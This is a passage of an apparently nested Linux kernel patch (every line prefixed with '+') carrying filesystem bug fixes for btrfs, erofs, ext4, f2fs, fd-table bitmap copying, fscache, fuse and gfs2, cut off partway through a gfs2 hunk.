+@@ -2426,7 +2426,7 @@ static int btrfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 		buf->f_bavail = 0;
+ 
+ 	buf->f_type = BTRFS_SUPER_MAGIC;
+-	buf->f_bsize = dentry->d_sb->s_blocksize;
++	buf->f_bsize = fs_info->sectorsize;
+ 	buf->f_namelen = BTRFS_NAME_LEN;
+ 
+ 	/* We treat it as constant endianness (it doesn't matter _which_)
+diff --git a/fs/btrfs/tests/extent-io-tests.c b/fs/btrfs/tests/extent-io-tests.c
+index 350da449db084..d6a5e6afd5dc0 100644
+--- a/fs/btrfs/tests/extent-io-tests.c
++++ b/fs/btrfs/tests/extent-io-tests.c
+@@ -11,6 +11,7 @@
+ #include "btrfs-tests.h"
+ #include "../ctree.h"
+ #include "../extent_io.h"
++#include "../disk-io.h"
+ #include "../btrfs_inode.h"
+ 
+ #define PROCESS_UNLOCK		(1 << 0)
+@@ -105,9 +106,11 @@ static void dump_extent_io_tree(const struct extent_io_tree *tree)
+ 	}
+ }
+ 
+-static int test_find_delalloc(u32 sectorsize)
++static int test_find_delalloc(u32 sectorsize, u32 nodesize)
+ {
+-	struct inode *inode;
++	struct btrfs_fs_info *fs_info;
++	struct btrfs_root *root = NULL;
++	struct inode *inode = NULL;
+ 	struct extent_io_tree *tmp;
+ 	struct page *page;
+ 	struct page *locked_page = NULL;
+@@ -121,12 +124,27 @@ static int test_find_delalloc(u32 sectorsize)
+ 
+ 	test_msg("running find delalloc tests");
+ 
++	fs_info = btrfs_alloc_dummy_fs_info(nodesize, sectorsize);
++	if (!fs_info) {
++		test_std_err(TEST_ALLOC_FS_INFO);
++		return -ENOMEM;
++	}
++
++	root = btrfs_alloc_dummy_root(fs_info);
++	if (IS_ERR(root)) {
++		test_std_err(TEST_ALLOC_ROOT);
++		ret = PTR_ERR(root);
++		goto out;
++	}
++
+ 	inode = btrfs_new_test_inode();
+ 	if (!inode) {
+ 		test_std_err(TEST_ALLOC_INODE);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto out;
+ 	}
+ 	tmp = &BTRFS_I(inode)->io_tree;
++	BTRFS_I(inode)->root = root;
+ 
+ 	/*
+ 	 * Passing NULL as we don't have fs_info but tracepoints are not used
+@@ -316,6 +334,8 @@ static int test_find_delalloc(u32 sectorsize)
+ 	process_page_range(inode, 0, total_dirty - 1,
+ 			   PROCESS_UNLOCK | PROCESS_RELEASE);
+ 	iput(inode);
++	btrfs_free_dummy_root(root);
++	btrfs_free_dummy_fs_info(fs_info);
+ 	return ret;
+ }
+ 
+@@ -598,7 +618,7 @@ int btrfs_test_extent_io(u32 sectorsize, u32 nodesize)
+ 
+ 	test_msg("running extent I/O tests");
+ 
+-	ret = test_find_delalloc(sectorsize);
++	ret = test_find_delalloc(sectorsize, nodesize);
+ 	if (ret)
+ 		goto out;
+ 
+diff --git a/fs/btrfs/tree-checker.c b/fs/btrfs/tree-checker.c
+index 02e8398246ae5..28f5df3b70c8a 100644
+--- a/fs/btrfs/tree-checker.c
++++ b/fs/btrfs/tree-checker.c
+@@ -1613,6 +1613,72 @@ static int check_inode_ref(struct extent_buffer *leaf,
+ 	return 0;
+ }
+ 
++static int check_dev_extent_item(const struct extent_buffer *leaf,
++				 const struct btrfs_key *key,
++				 int slot,
++				 struct btrfs_key *prev_key)
++{
++	struct btrfs_dev_extent *de;
++	const u32 sectorsize = leaf->fs_info->sectorsize;
++
++	de = btrfs_item_ptr(leaf, slot, struct btrfs_dev_extent);
++	/* Basic fixed member checks. */
++	if (unlikely(btrfs_dev_extent_chunk_tree(leaf, de) !=
++		     BTRFS_CHUNK_TREE_OBJECTID)) {
++		generic_err(leaf, slot,
++			    "invalid dev extent chunk tree id, has %llu expect %llu",
++			    btrfs_dev_extent_chunk_tree(leaf, de),
++			    BTRFS_CHUNK_TREE_OBJECTID);
++		return -EUCLEAN;
++	}
++	if (unlikely(btrfs_dev_extent_chunk_objectid(leaf, de) !=
++		     BTRFS_FIRST_CHUNK_TREE_OBJECTID)) {
++		generic_err(leaf, slot,
++			    "invalid dev extent chunk objectid, has %llu expect %llu",
++			    btrfs_dev_extent_chunk_objectid(leaf, de),
++			    BTRFS_FIRST_CHUNK_TREE_OBJECTID);
++		return -EUCLEAN;
++	}
++	/* Alignment check. */
++	if (unlikely(!IS_ALIGNED(key->offset, sectorsize))) {
++		generic_err(leaf, slot,
++			    "invalid dev extent key.offset, has %llu not aligned to %u",
++			    key->offset, sectorsize);
++		return -EUCLEAN;
++	}
++	if (unlikely(!IS_ALIGNED(btrfs_dev_extent_chunk_offset(leaf, de),
++				 sectorsize))) {
++		generic_err(leaf, slot,
++			    "invalid dev extent chunk offset, has %llu not aligned to %u",
++			    btrfs_dev_extent_chunk_objectid(leaf, de),
++			    sectorsize);
++		return -EUCLEAN;
++	}
++	if (unlikely(!IS_ALIGNED(btrfs_dev_extent_length(leaf, de),
++				 sectorsize))) {
++		generic_err(leaf, slot,
++			    "invalid dev extent length, has %llu not aligned to %u",
++			    btrfs_dev_extent_length(leaf, de), sectorsize);
++		return -EUCLEAN;
++	}
++	/* Overlap check with previous dev extent. */
++	if (slot && prev_key->objectid == key->objectid &&
++	    prev_key->type == key->type) {
++		struct btrfs_dev_extent *prev_de;
++		u64 prev_len;
++
++		prev_de = btrfs_item_ptr(leaf, slot - 1, struct btrfs_dev_extent);
++		prev_len = btrfs_dev_extent_length(leaf, prev_de);
++		if (unlikely(prev_key->offset + prev_len > key->offset)) {
++			generic_err(leaf, slot,
++		"dev extent overlap, prev offset %llu len %llu current offset %llu",
++				    prev_key->objectid, prev_len, key->offset);
++			return -EUCLEAN;
++		}
++	}
++	return 0;
++}
++
+ /*
+  * Common point to switch the item-specific validation.
+  */
+@@ -1648,6 +1714,9 @@ static int check_leaf_item(struct extent_buffer *leaf,
+ 	case BTRFS_DEV_ITEM_KEY:
+ 		ret = check_dev_item(leaf, key, slot);
+ 		break;
++	case BTRFS_DEV_EXTENT_KEY:
++		ret = check_dev_extent_item(leaf, key, slot, prev_key);
++		break;
+ 	case BTRFS_INODE_ITEM_KEY:
+ 		ret = check_inode_item(leaf, key, slot);
+ 		break;
+diff --git a/fs/erofs/decompressor.c b/fs/erofs/decompressor.c
+index 1eefa4411e066..708bf142b1888 100644
+--- a/fs/erofs/decompressor.c
++++ b/fs/erofs/decompressor.c
+@@ -248,15 +248,9 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 	if (ret != rq->outputsize) {
+ 		erofs_err(rq->sb, "failed to decompress %d in[%u, %u] out[%u]",
+ 			  ret, rq->inputsize, inputmargin, rq->outputsize);
+-
+-		print_hex_dump(KERN_DEBUG, "[ in]: ", DUMP_PREFIX_OFFSET,
+-			       16, 1, src + inputmargin, rq->inputsize, true);
+-		print_hex_dump(KERN_DEBUG, "[out]: ", DUMP_PREFIX_OFFSET,
+-			       16, 1, out, rq->outputsize, true);
+-
+ 		if (ret >= 0)
+ 			memset(out + ret, 0, rq->outputsize - ret);
+-		ret = -EIO;
++		ret = -EFSCORRUPTED;
+ 	} else {
+ 		ret = 0;
+ 	}
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 5cbe5ae5ad4a2..92b540754799c 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -3404,9 +3404,10 @@ static int ext4_ext_convert_to_initialized(handle_t *handle,
+ 	struct ext4_extent *ex, *abut_ex;
+ 	ext4_lblk_t ee_block, eof_block;
+ 	unsigned int ee_len, depth, map_len = map->m_len;
+-	int allocated = 0, max_zeroout = 0;
+ 	int err = 0;
+ 	int split_flag = EXT4_EXT_DATA_VALID2;
++	int allocated = 0;
++	unsigned int max_zeroout = 0;
+ 
+ 	ext_debug(inode, "logical block %llu, max_blocks %u\n",
+ 		  (unsigned long long)map->m_lblk, map_len);
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 004ad321a45d6..c723ee3e49959 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6483,6 +6483,9 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 	bool set_trimmed = false;
+ 	void *bitmap;
+ 
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)))
++		return 0;
++
+ 	last = ext4_last_grp_cluster(sb, e4b->bd_group);
+ 	bitmap = e4b->bd_bitmap;
+ 	if (start == 0 && max >= last)
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 274542d869d0c..3db39758486e9 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -5752,6 +5752,28 @@ static struct inode *ext4_get_journal_inode(struct super_block *sb,
+ 	return journal_inode;
+ }
+ 
++static int ext4_journal_bmap(journal_t *journal, sector_t *block)
++{
++	struct ext4_map_blocks map;
++	int ret;
++
++	if (journal->j_inode == NULL)
++		return 0;
++
++	map.m_lblk = *block;
++	map.m_len = 1;
++	ret = ext4_map_blocks(NULL, journal->j_inode, &map, 0);
++	if (ret <= 0) {
++		ext4_msg(journal->j_inode->i_sb, KERN_CRIT,
++			 "journal bmap failed: block %llu ret %d\n",
++			 *block, ret);
++		jbd2_journal_abort(journal, ret ? ret : -EIO);
++		return ret;
++	}
++	*block = map.m_pblk;
++	return 0;
++}
++
+ static journal_t *ext4_get_journal(struct super_block *sb,
+ 				   unsigned int journal_inum)
+ {
+@@ -5772,6 +5794,7 @@ static journal_t *ext4_get_journal(struct super_block *sb,
+ 		return NULL;
+ 	}
+ 	journal->j_private = sb;
++	journal->j_bmap = ext4_journal_bmap;
+ 	ext4_init_journal_params(sb, journal);
+ 	return journal;
+ }
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index f0a45d3ec4ebb..d94b1a6c60e27 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1522,45 +1522,49 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
+ /*
+  * Add value of the EA in an inode.
+  */
+-static int ext4_xattr_inode_lookup_create(handle_t *handle, struct inode *inode,
+-					  const void *value, size_t value_len,
+-					  struct inode **ret_inode)
++static struct inode *ext4_xattr_inode_lookup_create(handle_t *handle,
++		struct inode *inode, const void *value, size_t value_len)
+ {
+ 	struct inode *ea_inode;
+ 	u32 hash;
+ 	int err;
+ 
++	/* Account inode & space to quota even if sharing... */
++	err = ext4_xattr_inode_alloc_quota(inode, value_len);
++	if (err)
++		return ERR_PTR(err);
++
+ 	hash = ext4_xattr_inode_hash(EXT4_SB(inode->i_sb), value, value_len);
+ 	ea_inode = ext4_xattr_inode_cache_find(inode, value, value_len, hash);
+ 	if (ea_inode) {
+ 		err = ext4_xattr_inode_inc_ref(handle, ea_inode);
+-		if (err) {
+-			iput(ea_inode);
+-			return err;
+-		}
+-
+-		*ret_inode = ea_inode;
+-		return 0;
++		if (err)
++			goto out_err;
++		return ea_inode;
+ 	}
+ 
+ 	/* Create an inode for the EA value */
+ 	ea_inode = ext4_xattr_inode_create(handle, inode, hash);
+-	if (IS_ERR(ea_inode))
+-		return PTR_ERR(ea_inode);
++	if (IS_ERR(ea_inode)) {
++		ext4_xattr_inode_free_quota(inode, NULL, value_len);
++		return ea_inode;
++	}
+ 
+ 	err = ext4_xattr_inode_write(handle, ea_inode, value, value_len);
+ 	if (err) {
+-		ext4_xattr_inode_dec_ref(handle, ea_inode);
+-		iput(ea_inode);
+-		return err;
++		if (ext4_xattr_inode_dec_ref(handle, ea_inode))
++			ext4_warning_inode(ea_inode, "cleanup dec ref error %d", err);
++		goto out_err;
+ 	}
+ 
+ 	if (EA_INODE_CACHE(inode))
+ 		mb_cache_entry_create(EA_INODE_CACHE(inode), GFP_NOFS, hash,
+ 				      ea_inode->i_ino, true /* reusable */);
+-
+-	*ret_inode = ea_inode;
+-	return 0;
++	return ea_inode;
++out_err:
++	iput(ea_inode);
++	ext4_xattr_inode_free_quota(inode, NULL, value_len);
++	return ERR_PTR(err);
+ }
+ 
+ /*
+@@ -1572,6 +1576,7 @@ static int ext4_xattr_inode_lookup_create(handle_t *handle, struct inode *inode,
+ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 				struct ext4_xattr_search *s,
+ 				handle_t *handle, struct inode *inode,
++				struct inode *new_ea_inode,
+ 				bool is_block)
+ {
+ 	struct ext4_xattr_entry *last, *next;
+@@ -1579,7 +1584,6 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 	size_t min_offs = s->end - s->base, name_len = strlen(i->name);
+ 	int in_inode = i->in_inode;
+ 	struct inode *old_ea_inode = NULL;
+-	struct inode *new_ea_inode = NULL;
+ 	size_t old_size, new_size;
+ 	int ret;
+ 
+@@ -1664,43 +1668,11 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 			old_ea_inode = NULL;
+ 			goto out;
+ 		}
+-	}
+-	if (i->value && in_inode) {
+-		WARN_ON_ONCE(!i->value_len);
+-
+-		ret = ext4_xattr_inode_alloc_quota(inode, i->value_len);
+-		if (ret)
+-			goto out;
+-
+-		ret = ext4_xattr_inode_lookup_create(handle, inode, i->value,
+-						     i->value_len,
+-						     &new_ea_inode);
+-		if (ret) {
+-			new_ea_inode = NULL;
+-			ext4_xattr_inode_free_quota(inode, NULL, i->value_len);
+-			goto out;
+-		}
+-	}
+ 
+-	if (old_ea_inode) {
+ 		/* We are ready to release ref count on the old_ea_inode. */
+ 		ret = ext4_xattr_inode_dec_ref(handle, old_ea_inode);
+-		if (ret) {
+-			/* Release newly required ref count on new_ea_inode. */
+-			if (new_ea_inode) {
+-				int err;
+-
+-				err = ext4_xattr_inode_dec_ref(handle,
+-							       new_ea_inode);
+-				if (err)
+-					ext4_warning_inode(new_ea_inode,
+-						  "dec ref new_ea_inode err=%d",
+-						  err);
+-				ext4_xattr_inode_free_quota(inode, new_ea_inode,
+-							    i->value_len);
+-			}
++		if (ret)
+ 			goto out;
+-		}
+ 
+ 		ext4_xattr_inode_free_quota(inode, old_ea_inode,
+ 					    le32_to_cpu(here->e_value_size));
+@@ -1824,7 +1796,6 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 	ret = 0;
+ out:
+ 	iput(old_ea_inode);
+-	iput(new_ea_inode);
+ 	return ret;
+ }
+ 
+@@ -1887,9 +1858,21 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 	size_t old_ea_inode_quota = 0;
+ 	unsigned int ea_ino;
+ 
+-
+ #define header(x) ((struct ext4_xattr_header *)(x))
+ 
++	/* If we need EA inode, prepare it before locking the buffer */
++	if (i->value && i->in_inode) {
++		WARN_ON_ONCE(!i->value_len);
++
++		ea_inode = ext4_xattr_inode_lookup_create(handle, inode,
++					i->value, i->value_len);
++		if (IS_ERR(ea_inode)) {
++			error = PTR_ERR(ea_inode);
++			ea_inode = NULL;
++			goto cleanup;
++		}
++	}
++
+ 	if (s->base) {
+ 		int offset = (char *)s->here - bs->bh->b_data;
+ 
+@@ -1898,6 +1881,7 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 						      EXT4_JTR_NONE);
+ 		if (error)
+ 			goto cleanup;
++
+ 		lock_buffer(bs->bh);
+ 
+ 		if (header(s->base)->h_refcount == cpu_to_le32(1)) {
+@@ -1924,7 +1908,7 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 			}
+ 			ea_bdebug(bs->bh, "modifying in-place");
+ 			error = ext4_xattr_set_entry(i, s, handle, inode,
+-						     true /* is_block */);
++					     ea_inode, true /* is_block */);
+ 			ext4_xattr_block_csum_set(inode, bs->bh);
+ 			unlock_buffer(bs->bh);
+ 			if (error == -EFSCORRUPTED)
+@@ -1992,29 +1976,13 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 		s->end = s->base + sb->s_blocksize;
+ 	}
+ 
+-	error = ext4_xattr_set_entry(i, s, handle, inode, true /* is_block */);
++	error = ext4_xattr_set_entry(i, s, handle, inode, ea_inode,
++				     true /* is_block */);
+ 	if (error == -EFSCORRUPTED)
+ 		goto bad_block;
+ 	if (error)
+ 		goto cleanup;
+ 
+-	if (i->value && s->here->e_value_inum) {
+-		/*
+-		 * A ref count on ea_inode has been taken as part of the call to
+-		 * ext4_xattr_set_entry() above. We would like to drop this
+-		 * extra ref but we have to wait until the xattr block is
+-		 * initialized and has its own ref count on the ea_inode.
+-		 */
+-		ea_ino = le32_to_cpu(s->here->e_value_inum);
+-		error = ext4_xattr_inode_iget(inode, ea_ino,
+-					      le32_to_cpu(s->here->e_hash),
+-					      &ea_inode);
+-		if (error) {
+-			ea_inode = NULL;
+-			goto cleanup;
+-		}
+-	}
+-
+ inserted:
+ 	if (!IS_LAST_ENTRY(s->first)) {
+ 		new_bh = ext4_xattr_block_cache_find(inode, header(s->base),
+@@ -2167,17 +2135,16 @@ ext4_xattr_block_set(handle_t *handle, struct inode *inode,
+ 
+ cleanup:
+ 	if (ea_inode) {
+-		int error2;
+-
+-		error2 = ext4_xattr_inode_dec_ref(handle, ea_inode);
+-		if (error2)
+-			ext4_warning_inode(ea_inode, "dec ref error=%d",
+-					   error2);
++		if (error) {
++			int error2;
+ 
+-		/* If there was an error, revert the quota charge. */
+-		if (error)
++			error2 = ext4_xattr_inode_dec_ref(handle, ea_inode);
++			if (error2)
++				ext4_warning_inode(ea_inode, "dec ref error=%d",
++						   error2);
+ 			ext4_xattr_inode_free_quota(inode, ea_inode,
+ 						    i_size_read(ea_inode));
++		}
+ 		iput(ea_inode);
+ 	}
+ 	if (ce)
+@@ -2235,14 +2202,38 @@ int ext4_xattr_ibody_set(handle_t *handle, struct inode *inode,
+ {
+ 	struct ext4_xattr_ibody_header *header;
+ 	struct ext4_xattr_search *s = &is->s;
++	struct inode *ea_inode = NULL;
+ 	int error;
+ 
+ 	if (!EXT4_INODE_HAS_XATTR_SPACE(inode))
+ 		return -ENOSPC;
+ 
+-	error = ext4_xattr_set_entry(i, s, handle, inode, false /* is_block */);
+-	if (error)
++	/* If we need EA inode, prepare it before locking the buffer */
++	if (i->value && i->in_inode) {
++		WARN_ON_ONCE(!i->value_len);
++
++		ea_inode = ext4_xattr_inode_lookup_create(handle, inode,
++					i->value, i->value_len);
++		if (IS_ERR(ea_inode))
++			return PTR_ERR(ea_inode);
++	}
++	error = ext4_xattr_set_entry(i, s, handle, inode, ea_inode,
++				     false /* is_block */);
++	if (error) {
++		if (ea_inode) {
++			int error2;
++
++			error2 = ext4_xattr_inode_dec_ref(handle, ea_inode);
++			if (error2)
++				ext4_warning_inode(ea_inode, "dec ref error=%d",
++						   error2);
++
++			ext4_xattr_inode_free_quota(inode, ea_inode,
++						    i_size_read(ea_inode));
++			iput(ea_inode);
++		}
+ 		return error;
++	}
+ 	header = IHDR(inode, ext4_raw_inode(&is->iloc));
+ 	if (!IS_LAST_ENTRY(s->first)) {
+ 		header->h_magic = cpu_to_le32(EXT4_XATTR_MAGIC);
+@@ -2251,6 +2242,7 @@ int ext4_xattr_ibody_set(handle_t *handle, struct inode *inode,
+ 		header->h_magic = cpu_to_le32(0);
+ 		ext4_clear_inode_state(inode, EXT4_STATE_XATTR);
+ 	}
++	iput(ea_inode);
+ 	return 0;
+ }
+ 
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 1264a350d4d75..947849e66b0a7 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -2191,6 +2191,8 @@ static void update_sit_entry(struct f2fs_sb_info *sbi, block_t blkaddr, int del)
+ #endif
+ 
+ 	segno = GET_SEGNO(sbi, blkaddr);
++	if (segno == NULL_SEGNO)
++		return;
+ 
+ 	se = get_seg_entry(sbi, segno);
+ 	new_vblocks = se->valid_blocks + del;
+@@ -3286,8 +3288,7 @@ void f2fs_allocate_data_block(struct f2fs_sb_info *sbi, struct page *page,
+ 	 * since SSR needs latest valid block information.
+ 	 */
+ 	update_sit_entry(sbi, *new_blkaddr, 1);
+-	if (GET_SEGNO(sbi, old_blkaddr) != NULL_SEGNO)
+-		update_sit_entry(sbi, old_blkaddr, -1);
++	update_sit_entry(sbi, old_blkaddr, -1);
+ 
+ 	if (!__has_curseg_space(sbi, curseg)) {
+ 		if (from_gc)
+diff --git a/fs/file.c b/fs/file.c
+index 82c5d23820820..50a019fd1726a 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -46,27 +46,23 @@ static void free_fdtable_rcu(struct rcu_head *rcu)
+ #define BITBIT_NR(nr)	BITS_TO_LONGS(BITS_TO_LONGS(nr))
+ #define BITBIT_SIZE(nr)	(BITBIT_NR(nr) * sizeof(long))
+ 
++#define fdt_words(fdt) ((fdt)->max_fds / BITS_PER_LONG) // words in ->open_fds
+ /*
+  * Copy 'count' fd bits from the old table to the new table and clear the extra
+  * space if any.  This does not copy the file pointers.  Called with the files
+  * spinlock held for write.
+  */
+-static void copy_fd_bitmaps(struct fdtable *nfdt, struct fdtable *ofdt,
+-			    unsigned int count)
++static inline void copy_fd_bitmaps(struct fdtable *nfdt, struct fdtable *ofdt,
++			    unsigned int copy_words)
+ {
+-	unsigned int cpy, set;
+-
+-	cpy = count / BITS_PER_BYTE;
+-	set = (nfdt->max_fds - count) / BITS_PER_BYTE;
+-	memcpy(nfdt->open_fds, ofdt->open_fds, cpy);
+-	memset((char *)nfdt->open_fds + cpy, 0, set);
+-	memcpy(nfdt->close_on_exec, ofdt->close_on_exec, cpy);
+-	memset((char *)nfdt->close_on_exec + cpy, 0, set);
+-
+-	cpy = BITBIT_SIZE(count);
+-	set = BITBIT_SIZE(nfdt->max_fds) - cpy;
+-	memcpy(nfdt->full_fds_bits, ofdt->full_fds_bits, cpy);
+-	memset((char *)nfdt->full_fds_bits + cpy, 0, set);
++	unsigned int nwords = fdt_words(nfdt);
++
++	bitmap_copy_and_extend(nfdt->open_fds, ofdt->open_fds,
++			copy_words * BITS_PER_LONG, nwords * BITS_PER_LONG);
++	bitmap_copy_and_extend(nfdt->close_on_exec, ofdt->close_on_exec,
++			copy_words * BITS_PER_LONG, nwords * BITS_PER_LONG);
++	bitmap_copy_and_extend(nfdt->full_fds_bits, ofdt->full_fds_bits,
++			copy_words, nwords);
+ }
+ 
+ /*
+@@ -84,7 +80,7 @@ static void copy_fdtable(struct fdtable *nfdt, struct fdtable *ofdt)
+ 	memcpy(nfdt->fd, ofdt->fd, cpy);
+ 	memset((char *)nfdt->fd + cpy, 0, set);
+ 
+-	copy_fd_bitmaps(nfdt, ofdt, ofdt->max_fds);
++	copy_fd_bitmaps(nfdt, ofdt, fdt_words(ofdt));
+ }
+ 
+ /*
+@@ -374,7 +370,7 @@ struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int
+ 		open_files = sane_fdtable_size(old_fdt, max_fds);
+ 	}
+ 
+-	copy_fd_bitmaps(new_fdt, old_fdt, open_files);
++	copy_fd_bitmaps(new_fdt, old_fdt, open_files / BITS_PER_LONG);
+ 
+ 	old_fds = old_fdt->fd;
+ 	new_fds = new_fdt->fd;
+diff --git a/fs/fscache/cookie.c b/fs/fscache/cookie.c
+index bce2492186d0b..d4d4b3a8b1060 100644
+--- a/fs/fscache/cookie.c
++++ b/fs/fscache/cookie.c
+@@ -741,6 +741,10 @@ static void fscache_cookie_state_machine(struct fscache_cookie *cookie)
+ 			spin_lock(&cookie->lock);
+ 		}
+ 		if (test_bit(FSCACHE_COOKIE_DO_LRU_DISCARD, &cookie->flags)) {
++			if (atomic_read(&cookie->n_accesses) != 0)
++				/* still being accessed: postpone it */
++				break;
++
+ 			__fscache_set_cookie_state(cookie,
+ 						   FSCACHE_COOKIE_STATE_LRU_DISCARDING);
+ 			wake = true;
+diff --git a/fs/fuse/cuse.c b/fs/fuse/cuse.c
+index c7d882a9fe339..295344a462e1d 100644
+--- a/fs/fuse/cuse.c
++++ b/fs/fuse/cuse.c
+@@ -474,8 +474,7 @@ static int cuse_send_init(struct cuse_conn *cc)
+ 
+ static void cuse_fc_release(struct fuse_conn *fc)
+ {
+-	struct cuse_conn *cc = fc_to_cc(fc);
+-	kfree_rcu(cc, fc.rcu);
++	kfree(fc_to_cc(fc));
+ }
+ 
+ /**
+diff --git a/fs/fuse/dev.c b/fs/fuse/dev.c
+index b4a6e0a1b945a..96a717f73ce37 100644
+--- a/fs/fuse/dev.c
++++ b/fs/fuse/dev.c
+@@ -1615,9 +1615,11 @@ static int fuse_notify_store(struct fuse_conn *fc, unsigned int size,
+ 
+ 		this_num = min_t(unsigned, num, PAGE_SIZE - offset);
+ 		err = fuse_copy_page(cs, &page, offset, this_num, 0);
+-		if (!err && offset == 0 &&
+-		    (this_num == PAGE_SIZE || file_size == end))
++		if (!PageUptodate(page) && !err && offset == 0 &&
++		    (this_num == PAGE_SIZE || file_size == end)) {
++			zero_user_segment(page, this_num, PAGE_SIZE);
+ 			SetPageUptodate(page);
++		}
+ 		unlock_page(page);
+ 		put_page(page);
+ 
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index 253b9b78d6f13..66c2a99994683 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -872,6 +872,7 @@ struct fuse_mount {
+ 
+ 	/* Entry on fc->mounts */
+ 	struct list_head fc_entry;
++	struct rcu_head rcu;
+ };
+ 
+ static inline struct fuse_mount *get_fuse_mount_super(struct super_block *sb)
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index f19bdd7cbd779..64618548835b4 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -925,6 +925,14 @@ void fuse_conn_init(struct fuse_conn *fc, struct fuse_mount *fm,
+ }
+ EXPORT_SYMBOL_GPL(fuse_conn_init);
+ 
++static void delayed_release(struct rcu_head *p)
++{
++	struct fuse_conn *fc = container_of(p, struct fuse_conn, rcu);
++
++	put_user_ns(fc->user_ns);
++	fc->release(fc);
++}
++
+ void fuse_conn_put(struct fuse_conn *fc)
+ {
+ 	if (refcount_dec_and_test(&fc->count)) {
+@@ -936,13 +944,12 @@ void fuse_conn_put(struct fuse_conn *fc)
+ 		if (fiq->ops->release)
+ 			fiq->ops->release(fiq);
+ 		put_pid_ns(fc->pid_ns);
+-		put_user_ns(fc->user_ns);
+ 		bucket = rcu_dereference_protected(fc->curr_bucket, 1);
+ 		if (bucket) {
+ 			WARN_ON(atomic_read(&bucket->count) != 1);
+ 			kfree(bucket);
+ 		}
+-		fc->release(fc);
++		call_rcu(&fc->rcu, delayed_release);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(fuse_conn_put);
+@@ -1356,7 +1363,7 @@ EXPORT_SYMBOL_GPL(fuse_send_init);
+ void fuse_free_conn(struct fuse_conn *fc)
+ {
+ 	WARN_ON(!list_empty(&fc->devices));
+-	kfree_rcu(fc, rcu);
++	kfree(fc);
+ }
+ EXPORT_SYMBOL_GPL(fuse_free_conn);
+ 
+@@ -1895,7 +1902,7 @@ static void fuse_sb_destroy(struct super_block *sb)
+ void fuse_mount_destroy(struct fuse_mount *fm)
+ {
+ 	fuse_conn_put(fm->fc);
+-	kfree(fm);
++	kfree_rcu(fm, rcu);
+ }
+ EXPORT_SYMBOL(fuse_mount_destroy);
+ 
+diff --git a/fs/fuse/virtio_fs.c b/fs/fuse/virtio_fs.c
+index 4d8d4f16c727b..92d41269f1d35 100644
+--- a/fs/fuse/virtio_fs.c
++++ b/fs/fuse/virtio_fs.c
+@@ -323,6 +323,16 @@ static int virtio_fs_read_tag(struct virtio_device *vdev, struct virtio_fs *fs)
+ 		return -ENOMEM;
+ 	memcpy(fs->tag, tag_buf, len);
+ 	fs->tag[len] = '\0';
++
++	/* While the VIRTIO specification allows any character, newlines are
++	 * awkward on mount(8) command-lines and cause problems in the sysfs
++	 * "tag" attr and uevent TAG= properties. Forbid them.
++	 */
++	if (strchr(fs->tag, '\n')) {
++		dev_dbg(&vdev->dev, "refusing virtiofs tag with newline character\n");
++		return -EINVAL;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/gfs2/glock.c b/fs/gfs2/glock.c
+index 95353982e643a..6ba8460f53318 100644
+--- a/fs/gfs2/glock.c
++++ b/fs/gfs2/glock.c
+@@ -146,8 +146,8 @@ static void gfs2_glock_dealloc(struct rcu_head *rcu)
+  *
+  * We need to allow some glocks to be enqueued, dequeued, promoted, and demoted
+  * when we're withdrawn. For example, to maintain metadata integrity, we should
+- * disallow the use of inode and rgrp glocks when withdrawn. Other glocks, like
+- * iopen or the transaction glocks may be safely used because none of their
++ * disallow the use of inode and rgrp glocks when withdrawn. Other glocks like
++ * the iopen or freeze glock may be safely used because none of their
+  * metadata goes through the journal. So in general, we should disallow all
+  * glocks that are journaled, and allow all the others. One exception is:
+  * we need to allow our active journal to be promoted and demoted so others
+@@ -661,8 +661,7 @@ static void finish_xmote(struct gfs2_glock *gl, unsigned int ret)
+ 		if (gh && !test_bit(GLF_DEMOTE_IN_PROGRESS, &gl->gl_flags)) {
+ 			/* move to back of queue and try next entry */
+ 			if (ret & LM_OUT_CANCELED) {
+-				if ((gh->gh_flags & LM_FLAG_PRIORITY) == 0)
+-					list_move_tail(&gh->gh_list, &gl->gl_holders);
++				list_move_tail(&gh->gh_list, &gl->gl_holders);
+ 				gh = find_first_waiter(gl);
+ 				gl->gl_target = gh->gh_state;
+ 				goto retry;
+@@ -749,8 +748,7 @@ __acquires(&gl->gl_lockref.lock)
+ 	    gh && !(gh->gh_flags & LM_FLAG_NOEXP))
+ 		goto skip_inval;
+ 
+-	lck_flags &= (LM_FLAG_TRY | LM_FLAG_TRY_1CB | LM_FLAG_NOEXP |
+-		      LM_FLAG_PRIORITY);
